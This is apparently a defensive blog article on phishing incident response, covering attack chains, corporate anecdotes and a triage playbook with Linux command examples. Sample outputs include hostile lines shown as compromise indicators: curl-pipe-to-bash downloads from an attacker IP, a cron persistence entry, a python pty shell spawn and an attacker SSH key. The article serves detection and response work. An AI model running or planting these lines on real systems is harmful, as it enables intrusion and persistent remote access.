It usually doesn’t start with malware fireworks. It starts with a normal Tuesday: an invoice, a shared document, a meeting update. Someone clicks. Nothing obvious happens. The user shrugs and goes back to work.
Meanwhile, you just handed a stranger a toehold inside your identity systems—the place where “security” becomes “who are you, really?” That click doesn’t have to be fatal. But the way most companies are built—too much implicit trust, too many long-lived credentials, too much shared infrastructure—turns a small mistake into a front-page mess.
The headline path: click → creds → movement → impact
Phishing is not “an email problem.” It’s an identity and authorization problem that begins in email and ends wherever your organization trusts identity too much.
The modern phishing chain usually looks like one of these:
- Credential harvest: user enters credentials into a fake login page. Attacker uses them immediately, often from cloud infrastructure close to your region.
- OAuth consent abuse: user authorizes a malicious app (“View document”) that requests permissions in Microsoft 365/Google Workspace. No password stolen; tokens do the work.
- Session hijack: attacker steals session cookies or refresh tokens via adversary-in-the-middle tooling or malware. MFA gets politely stepped around.
- Attachment execution: user runs a file that drops an agent. Classic, but still alive. Macro blocking helped; attackers moved to LNK, ISO, OneNote, HTML smuggling, and “signed-but-evil” loaders.
Why one click becomes a company incident
Because your internal architecture probably has at least three of these “headline accelerators”:
- Overprivileged identities: the user can access too much; the user’s tokens can access even more; service accounts are a horror novella.
- Flat networks: segmentation exists on a slide, not on the wire.
- Weak detection: logs are missing, not centralized, or not queryable at 2 a.m.
- Recoverability gaps: backups exist, but restore time is measured in “weeks plus prayer.”
- Trusting email as a control plane: password resets, invoice approvals, bank detail changes—done over email because “it’s faster.”
Attackers don’t need sophistication if your environment is generous. They take the shortest path to money: invoice fraud, payroll diversion, ransomware, data theft, extortion.
One quote worth stapling to your runbooks: “Hope is not a strategy.” — Gen. Gordon R. Sullivan. You can’t hope your users won’t click; you design systems that survive when they do.
Joke #1: Phishing emails are the only “urgent” requests that always arrive right after you pour coffee. The universe has impeccable timing and zero empathy.
Interesting facts and historical context (the uncomfortable kind)
- Phishing isn’t new: the term traces back to mid-1990s AOL scams targeting usernames and passwords. What changed is scale and automation.
- MFA didn’t kill phishing: it shifted attackers toward session hijacking, push fatigue, and OAuth consent abuse—identity-native bypasses.
- Business email compromise (BEC) is often “malware-free”: many cases involve only stolen credentials and inbox rules, which means AV can be perfectly green while your bank details quietly change.
- Attackers love “living off the land”: PowerShell, WMI, scheduled tasks, and legitimate remote tools reduce the need for obvious malware binaries.
- Cloud logs became the new perimeter telemetry: sign-in events, token grants, and mailbox rule changes often show the first real evidence of compromise.
- DNS is still a weak link: domain lookalikes and recently registered domains are common; many environments don’t block newly observed domains by policy.
- Ransomware crews professionalized: double extortion (encrypt + leak) became a business model; phishing is one of the cheapest initial access vectors.
- Email authentication evolved slowly: SPF and DKIM helped, but without strict DMARC enforcement, spoofing and lookalikes remain effective.
- Backups became a target: attackers routinely seek admin consoles, backup repositories, and snapshot deletion rights early in the intrusion.
Three mini-stories from the corporate trenches
Mini-story #1: The incident caused by a wrong assumption
The company had “MFA everywhere.” That was the phrase. It showed up in board decks and vendor questionnaires. The security team believed it too, because for interactive logins to the main SSO portal, MFA was enforced.
A finance analyst received a convincing “shared spreadsheet” email. The link went to a reverse-proxy login page. The analyst typed credentials and approved the MFA push. The attacker captured the session cookie and immediately used it from a clean cloud VM. No brute force. No impossible travel alert, because the attacker proxied through a region close to the victim.
The wrong assumption was subtle: “MFA means the attacker can’t log in.” In reality, MFA protected the authentication ceremony, not the session after. Once the session token existed, the attacker rode it like a stolen valet ticket.
They spent two days looking for malware on endpoints. There was none. The attacker changed mailbox rules to hide replies, initiated vendor payment changes, and used the account to phish internally. The first real indicator was a suspicious OAuth token grant in the identity logs—found late because those logs weren’t ingested into the SIEM. Identity was the breach; endpoints were just witnesses.
Mini-story #2: The optimization that backfired
IT wanted fewer tickets. They implemented a “streamlined” password reset flow: managers could approve password resets by email for their direct reports. It reduced helpdesk workload and made onboarding smoother. Everyone applauded. Automation! Efficiency! Fewer humans!
Then a senior manager got phished. The attacker didn’t need admin access. They only needed that manager’s mailbox. With it, they approved a password reset for a privileged account under the manager’s chain. The attacker took over the privileged account, then used it to add new MFA methods, register new devices, and create persistent access.
It wasn’t a technical exploit. It was a process exploit. The “optimization” made email a security control plane. Email is not a secure control plane; it’s a postcard that sometimes arrives.
The fix was boring: remove email-based approvals for resets, require out-of-band verification, enforce privileged account separation, and add workflow-based approvals inside an authenticated system with audit trails. Yes, it created tickets again. Tickets are cheaper than headlines.
Mini-story #3: The boring but correct practice that saved the day
A mid-sized SaaS company had a habit that wasn’t glamorous: quarterly restore tests. Not “we checked the backup job succeeded.” Actual restores into an isolated environment. They treated restore time as an SLO.
When a developer clicked a phish that led to an endpoint compromise, the attacker eventually reached the virtualization cluster and attempted to encrypt file shares. They also tried to access the backup system, but it required separate credentials, enforced MFA, and lived in a management network with tight firewall rules. Snapshots were immutable for a retention window. Deletion required a second approval and a different admin role.
The attacker still caused damage: some shares were encrypted, and a few systems needed rebuilds. But recovery was measured in hours, not weeks. They restored clean data, rotated credentials, and used the incident to tighten conditional access policies.
Nothing about it was flashy. It was the kind of controls that don’t demo well. And it worked, because reliability is mostly the art of being uninteresting at scale.
Joke #2: The only thing that scales faster than cloud resources is the confidence of someone who just clicked “Enable content.”
Fast diagnosis playbook: find the bottleneck in minutes
You’re on-call. Someone reports a suspicious email and “I entered my password.” Or you see a spike in failed logins, or a finance wire looks wrong. The goal isn’t perfect attribution. The goal is to stop the bleeding fast, then understand what happened.
First 15 minutes: stop the spread, preserve evidence
- Identify the user and the time window: get the recipient address, click time, device used, and whether credentials were entered or MFA approved.
- Disable sign-in or force token revocation: lock the identity down before you chase endpoints.
- Check for mailbox rules and forwarding: this is where BEC hides.
- Scope sign-ins: new IPs, new devices, new user agents, new countries/ASNs, sign-ins to admin portals.
- Look for OAuth app grants: “consent” can be persistence.
Next 60 minutes: determine blast radius
- Check lateral movement: new SSH keys, new local admins, new scheduled tasks, RDP events, unusual WinRM usage.
- Check privileged systems: identity admin accounts, backup consoles, hypervisor management, password vaults.
- Check egress: unusual outbound connections, data transfers, large downloads from file stores.
- Hunt for the phishing email: who else received it, who clicked, who entered creds.
Third phase: recovery and hardening
- Rotate credentials: user passwords, API keys, service account secrets, and any tokens you can invalidate.
- Rebuild where needed: don’t “clean” critical compromised hosts unless you have mature forensics and a reason.
- Fix the control that failed: DMARC policy, conditional access, admin separation, network segmentation, backup immutability.
- Write the postmortem like an engineer: timeline, detection gap, containment actions, and a short list of changes that will actually get done.
Practical tasks with commands: verify, decide, act
These are hands-on checks you can run during triage. Each one includes what the output means and the decision you make. Adjust hostnames, usernames, and paths to your environment.
Task 1: Confirm whether the user’s machine is making suspicious outbound connections (Linux)
cr0x@server:~$ sudo ss -tpn state established | head -n 12
ESTAB 0 0 10.20.5.34:48212 104.21.14.55:443 users:(("chrome",pid=2314,fd=123))
ESTAB 0 0 10.20.5.34:48244 203.0.113.44:443 users:(("curl",pid=2891,fd=3))
ESTAB 0 0 10.20.5.34:39510 10.20.0.15:389 users:(("sssd",pid=1120,fd=14))
What it means: You’re looking for unexpected processes talking to the internet (e.g., curl, python, unknown binaries) or rare destinations. The LDAP connection is normal; curl to a public IP might not be.
Decision: If you see suspicious processes or destinations, isolate the host (EDR network containment or firewall quarantine) and capture process details before killing anything.
Task 2: Check DNS resolution history via systemd-resolved (Linux)
cr0x@server:~$ sudo journalctl -u systemd-resolved --since "2 hours ago" | grep -E "query|reply" | tail -n 8
Jan 22 09:14:02 host systemd-resolved[713]: Using degraded feature set UDP instead of TCP for DNS server 10.20.0.53.
Jan 22 09:18:11 host systemd-resolved[713]: Querying A phishing-docs-login.com IN A on 10.20.0.53
Jan 22 09:18:11 host systemd-resolved[713]: Reply received from 10.20.0.53 for phishing-docs-login.com IN A: 203.0.113.44
What it means: A recent query for a suspicious domain, and the resolved IP. This is often your pivot for proxy logs and firewall blocks.
Decision: Block the domain and resolved IP at your DNS security layer / proxy, then search for other clients querying it.
Task 3: Determine whether the host recently downloaded and executed a file (Linux bash history is not proof, but it’s a clue)
cr0x@server:~$ sudo grep -R "curl\|wget\|bash -c" /home/*/.bash_history 2>/dev/null | tail -n 5
/home/alex/.bash_history:curl -fsSL http://203.0.113.44/a.sh | bash
What it means: Someone ran a classic “pipe to bash” command. That’s either an attacker or a developer having a very bad day.
Decision: Treat as compromise. Isolate host, acquire forensic artifacts, and begin credential rotation for any secrets reachable from that host.
Task 4: Find recent new local admin additions (Linux)
cr0x@server:~$ sudo journalctl --since "24 hours ago" | grep -E "useradd|usermod|groupadd|gpasswd" | tail -n 10
Jan 21 23:10:07 host usermod[8123]: add 'alex' to group 'sudo'
What it means: A user was added to sudo. That’s a privilege escalation indicator if unexpected.
Decision: Verify change ticket. If no legitimate reason, remove membership, rotate credentials, and widen hunting for similar events.
Task 5: Check SSH authorized keys for unexpected additions (Linux)
cr0x@server:~$ sudo find /home -maxdepth 2 -name authorized_keys -type f -exec ls -l {} \; -exec tail -n 2 {} \;
-rw------- 1 alex alex 392 Jan 22 09:20 /home/alex/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP0F... attacker@vm
What it means: A new SSH key recently added is a common persistence mechanism.
Decision: Remove the key, check auth logs for logins using it, and rotate any keys or tokens stored in that home directory.
Task 6: Inspect authentication logs for anomalous SSH logins (Linux)
cr0x@server:~$ sudo grep "Accepted" /var/log/auth.log | tail -n 6
Jan 22 09:22:31 host sshd[9211]: Accepted publickey for alex from 203.0.113.44 port 51322 ssh2: ED25519 SHA256:Qm...
What it means: Successful login from a public IP. If that host should be internal-only, this is critical.
Decision: Block the source IP, verify firewall exposure, rotate user keys, and inspect what commands ran after login (shell history, auditd, process accounting).
Task 7: Find suspicious scheduled tasks / cron jobs (Linux)
cr0x@server:~$ sudo crontab -l
*/5 * * * * /usr/bin/curl -fsSL http://203.0.113.44/.x | /bin/bash
What it means: Persistence. Also, audacity.
Decision: Remove the cron entry, isolate host, and search fleet-wide for similar patterns.
Task 8: Identify suspicious processes and their parent chain (Linux)
cr0x@server:~$ ps -eo pid,ppid,user,cmd --sort=-lstart | tail -n 8
2891 2314 alex curl -fsSL http://203.0.113.44/a.sh
2893 2891 alex /bin/bash
2899 2893 alex python3 -c import pty;pty.spawn("/bin/bash")
What it means: A curl download launching bash, which spawns Python and a TTY. That’s a typical interactive attacker workflow.
Decision: Capture memory/process details if you have tooling; otherwise isolate and rebuild. Don’t “poke” the attacker for fun in production.
Task 9: Check for suspicious outbound connections at the firewall (pfSense example via logs on a syslog host)
cr0x@server:~$ sudo grep "block" /var/log/pfsense.log | grep "203.0.113.44" | tail -n 5
Jan 22 09:25:10 fw filterlog: 5,,,1000000103,igb1,match,block,in,4,0x0,,64,0,0,DF,6,tcp,60,10.20.5.34,203.0.113.44,48244,443,0,S,123456789,,64240,,mss;sackOK;TS;nop;wscale
What it means: A block event confirms the host attempted to connect to a suspicious IP. If you see allows, it’s worse.
Decision: If traffic is allowed, add a block rule and check proxy logs for payload downloads. If blocked, proceed with host investigation—attempts still matter.
Task 10: Verify DMARC policy status for your domain (DNS query)
cr0x@server:~$ dig +short TXT _dmarc.example.com
"v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com; ruf=mailto:dmarc-fail@example.com; fo=1"
What it means: p=none is monitoring only. You’re wearing a helmet but not buckling it.
Decision: Plan a staged move to p=quarantine then p=reject after validating legitimate senders. Track false positives before enforcing.
Task 11: Check for unexpected forwarding rules in Postfix (server-side)
cr0x@server:~$ sudo postconf -n | grep -E "smtpd_sender_restrictions|smtpd_recipient_restrictions"
smtpd_sender_restrictions = reject_unknown_sender_domain
smtpd_recipient_restrictions = permit_mynetworks,reject_unauth_destination
What it means: This validates server restrictions; it won’t show per-user mailbox rules (those live in your mail platform). But it tells you whether your MTA is an open relay or permissive.
Decision: If you see permissive relay behavior, fix immediately. If server config is sane, focus on cloud mailbox rules and identity logs.
Task 12: Confirm backups are restorable and not silently failing (ZFS example)
cr0x@server:~$ sudo zpool status -x
all pools are healthy
What it means: The pool reports healthy. This is necessary, not sufficient; a “healthy” pool can still contain encrypted garbage if you backed up encrypted files.
Decision: If unhealthy, fix storage first. If healthy, proceed to verify snapshot presence and perform a restore test.
Task 13: Verify immutable-ish retention via ZFS snapshots (existence and age)
cr0x@server:~$ sudo zfs list -t snapshot -o name,creation -s creation | tail -n 5
tank/backups@auto-2026-01-22_0900 Wed Jan 22 09:00 2026
tank/backups@auto-2026-01-22_1000 Wed Jan 22 10:00 2026
What it means: You have recent snapshots. If snapshots stop or are missing, attackers might have touched scheduling—or you have a boring reliability issue that becomes a security issue.
Decision: If snapshots exist and are protected (access controls!), plan restores from a snapshot taken before compromise. If missing, assume backup integrity risk and escalate.
Task 14: Test an actual restore to validate backup usability (ZFS clone)
cr0x@server:~$ sudo zfs clone tank/backups@auto-2026-01-22_0900 tank/restore-test
cr0x@server:~$ sudo ls -lah /tank/restore-test | head -n 5
total 24K
drwxr-xr-x 6 root root 6 Jan 22 09:00 .
drwxr-xr-x 3 root root 3 Jan 22 10:12 ..
-rw-r--r-- 1 root root 12K Jan 22 08:58 accounts.db
What it means: You can materialize a point-in-time view without modifying the original snapshot. This is exactly how you reduce panic during ransomware recovery.
Decision: If restore works, you have a viable recovery path. If it fails, you don’t have backups—you have optimism stored on disk.
Task 15: Spot sudden disk churn that could indicate encryption activity (Linux)
cr0x@server:~$ iostat -xm 1 3
Linux 6.5.0 (fileserver) 01/22/2026 _x86_64_ (8 CPU)
Device r/s w/s rMB/s wMB/s avgrq-sz avgqu-sz await %util
nvme0n1 5.00 820.00 0.20 110.50 270.0 7.20 8.60 98.00
What it means: Heavy sequential writes with high utilization can be backups… or mass encryption. Context matters: which process is writing?
Decision: Correlate with process I/O (next task). If it’s unexpected, isolate the host or revoke share access immediately.
Task 16: Identify which process is hammering the disk (Linux)
cr0x@server:~$ sudo iotop -b -n 1 | head -n 12
Total DISK READ: 0.00 B/s | Total DISK WRITE: 120.00 M/s
PID PRIO USER DISK READ DISK WRITE SWAPIN IO> COMMAND
8122 be/4 www-data 0.00 B/s 95.00 M/s 0.00 % 99.00 % /usr/bin/python3 /tmp/enc.py
What it means: A suspicious script writing at high throughput. That’s your smoking gun.
Decision: Contain now. Kill the process after capturing artifacts if you can do so safely. Prefer network isolation and snapshotting volumes for forensics where available.
Common mistakes: symptoms → root cause → fix
1) “We have MFA, so this can’t be account takeover”
Symptoms: Legitimate MFA approvals but suspicious sign-ins; users insist they “did MFA once and then nothing.”
Root cause: Session hijacking / token theft, or OAuth consent grants that create long-lived access.
Fix: Enforce phishing-resistant MFA for high-risk users (FIDO2/WebAuthn), reduce session lifetimes, use conditional access (device compliance, risk-based), alert on new OAuth grants and token anomalies.
2) “No malware found, so it’s fine”
Symptoms: Finance fraud, hidden mailbox rules, weird email conversations, but endpoints scan clean.
Root cause: BEC is often identity-only; the attacker lives in cloud mail and uses rules/forwarding to hide.
Fix: Inspect mailbox rules, forwarding settings, OAuth apps, sign-in history, and admin activity logs. Treat identity telemetry as first-class security data.
3) “We blocked the domain; incident closed”
Symptoms: Security closes after adding a DNS block; weeks later, another account shows similar behavior.
Root cause: The phishing domain was just the on-ramp. Credentials/tokens are already stolen. Also, attackers rotate domains fast.
Fix: Force credential resets, revoke sessions, review inbox rules, and hunt for related recipients/clickers. Focus on identities and persistence mechanisms.
4) “Our backups are good; jobs are green”
Symptoms: During recovery, restores fail or are too slow; backup console access is suspiciously easy.
Root cause: No restore testing, no immutability, backups share admin plane with production, or backup credentials are reused.
Fix: Implement immutable snapshot retention (where possible), separate backup admin accounts, isolate backup networks, and run restore drills with measured RTO.
5) “We can just clean the host”
Symptoms: Re-infection, repeated callbacks, reappearance of scheduled tasks or startup items.
Root cause: Persistence not fully removed; credentials reused; attacker still has identity access.
Fix: Prefer rebuild for high-value systems; rotate credentials broadly; validate IAM and tokens; re-image endpoints used for privileged actions.
6) “Segmentation is too hard; we’ll do it later”
Symptoms: One user compromise leads to access to file shares, management networks, and backup systems.
Root cause: Flat network and shared admin paths; implicit trust inside.
Fix: Segment management planes, enforce jump hosts, restrict east-west traffic, and require separate privileged identities.
Checklists / step-by-step plan
Containment checklist (same day)
- Disable affected user sign-in and revoke sessions/tokens in your identity provider.
- Reset the user’s password and any related recovery factors; remove newly added MFA methods.
- Inspect and remove mailbox forwarding, inbox rules, delegate access, and suspicious OAuth app consents.
- Search for the phishing email across mailboxes; quarantine it; identify other recipients and clickers.
- Isolate the endpoint if there’s any sign of execution, persistence, or unusual outbound traffic.
- Block domains/IPs associated with the phishing infrastructure at DNS/proxy/firewall layers.
- Check privileged systems: admin portals, backup consoles, hypervisors, password vault access logs.
- Start a timeline: first click, first suspicious sign-in, first policy change, first data access.
Eradication checklist (this week)
- Rotate credentials for exposed systems: API keys, service accounts, SSH keys, database passwords.
- Remove unauthorized persistence: cron jobs, scheduled tasks, startup items, new admin users, SSH keys.
- Rebuild compromised hosts; validate golden images; patch baseline vulnerabilities.
- Hunt for related activity across the fleet (same domains, same IPs, same OAuth app IDs, same user agent patterns).
- Confirm backups are intact and restorable; perform an isolated restore test from a pre-incident snapshot.
Hardening checklist (this quarter)
- Move DMARC from
p=noneto enforcement in staged steps; inventory legitimate senders first. - Require phishing-resistant MFA for admins and finance; reduce session lifetimes for high-risk roles.
- Separate privileged accounts: no email, no browsing, no Slack, no “daily driver” usage.
- Implement conditional access: device compliance, location risk, impossible travel alerts, and token protection where available.
- Segment networks: management plane isolation, restricted SMB/RDP/SSH, and egress filtering by role.
- Protect backups: separate admin plane, immutable retention, and deletion controls requiring a different role.
- Centralize logs: identity sign-ins, mailbox changes, endpoint events, proxy/DNS, and backup admin actions.
- Run incident drills: table-top plus at least one practical “disable user + revoke tokens + restore data” exercise.
FAQ
1) If a user clicked but didn’t enter credentials, is it still an incident?
Maybe. A click can still trigger drive-by downloads, OAuth consent prompts, or redirect chains. Treat it as a potential incident: check sign-ins, endpoint telemetry, and whether a file was downloaded or executed.
2) What’s the first account action you take after confirmed credential entry?
Revoke sessions/tokens and disable sign-in (temporarily). Password reset alone can leave active sessions alive. You want to cut off live access first, then rotate credentials.
3) Why do attackers change mailbox rules?
To hide. They’ll auto-archive replies, forward threads to external mailboxes, or suppress messages containing keywords like “invoice,” “wire,” or “payment.” It’s low-tech, high-impact persistence.
4) Does DMARC stop phishing?
It stops some spoofing of your exact domain when enforced. It doesn’t stop lookalike domains, compromised vendor accounts, or attacker-owned domains. Still: enforce it. It’s table stakes and reduces your brand being used as a weapon.
5) Why do “MFA everywhere” programs still get owned?
Because not all MFA is equal, and sessions are valuable. Push MFA can be fatigued, proxied, or bypassed with stolen tokens. Phishing-resistant MFA plus conditional access and short sessions materially changes the attacker’s economics.
6) Should we isolate the endpoint immediately?
If there’s any sign of execution, persistence, or suspicious outbound connections, yes. If it’s strictly credential theft with no endpoint signs, focus first on identity containment—then check the endpoint without disrupting evidence unnecessarily.
7) When do you rebuild versus clean a host?
Rebuild when the host is privileged, internet-facing, or shows signs of attacker tooling/persistence. “Cleaning” is fine for low-risk endpoints if you have strong EDR and verified containment, but rebuild is often cheaper than uncertainty.
8) How do backups fit into phishing, specifically?
Phishing is often the initial access that leads to ransomware. Ransomware is an availability incident. If backups aren’t immutable, segmented, and tested, your recovery plan becomes a public relations plan.
9) What’s the most overlooked log source during phishing response?
Identity provider and email admin audit logs: sign-ins, token grants, mailbox rule changes, forwarding changes, and admin role assignments. That’s where the attacker lives when they’re being “quiet.”
Conclusion: next steps you can do this week
If you want fewer headlines, stop treating phishing as a user training problem. Training helps, but architecture wins. The click is inevitable; the catastrophe is optional.
Do these next:
- Make identity logs non-optional: ingest sign-ins, token grants, and mailbox audit events into your central logging so you can answer “what happened?” quickly.
- Harden the roles that move money and hold keys: finance, admins, and backup operators get phishing-resistant MFA and shorter sessions.
- Fix email’s authority problem: stop approving high-risk actions by email. Move approvals into authenticated systems with strong audit trails.
- Prove your restores: run at least one restore test from a known-good snapshot and time it. If you can’t restore fast, you can’t recover—only negotiate.
- Write a one-page playbook: disable user, revoke tokens, check mailbox rules, hunt recipients, isolate endpoints. Make it runnable by whoever is awake.
Phishing isn’t going away. But you can make “one click” a ticket, not a takeover. That’s the difference between an internal incident report and a news cycle with your logo in it.